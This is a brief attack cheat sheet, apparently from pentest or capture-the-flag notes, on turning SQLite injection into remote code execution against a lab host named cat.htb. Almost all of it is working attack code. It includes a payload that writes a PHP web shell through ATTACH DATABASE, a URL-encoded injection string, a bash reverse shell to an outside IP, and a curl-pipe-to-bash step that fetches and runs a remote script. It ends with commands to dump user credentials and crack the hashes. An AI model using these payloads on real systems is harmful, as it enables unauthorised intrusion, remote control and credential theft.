SQLite

Remote Code Execution

From PayloadAllTheThings

ATTACH DATABASE '/var/www/lol.php' AS lol;
CREATE TABLE lol.pwn (dataz text);
INSERT INTO lol.pwn (dataz) VALUES ("<?php system($_GET['cmd']); ?>");--

URL Encoded Example

catName=x')%3bATTACH+DATABASE+'/var/www/cat.htb/lol.php'+AS+lol%3b+CREATE+TABLE+lol.pwn+(dataz+text)%3b+INSERT+INTO+lol.pwn+(dataz)+VALUES+("<%3fphp+system($_GET['cmd'])%3b+%3f>")%3b--&catId=1
Check you have RCE
curl http://cat.htb/lol.php?cmd=id --output -
Create a reverse shell
#!/bin/bash
/bin/bash -i >& /dev/tcp/10.10.14.91/10001 0>&1
Call the reverse shell
curl http://cat.htb/lol.php?cmd=curl%2010.10.16.30:8000/revshell.sh|bash
Crack hashes
Get the credentials
SELECT username,password FROM users;
Replace all | with :
sed -i -e 's/|/:/g' hashes.txt
Use John
john -w=rockyou.txt hashes.txt --format=Raw-MD5
PreviousSQLiNextSQLmap

Last updated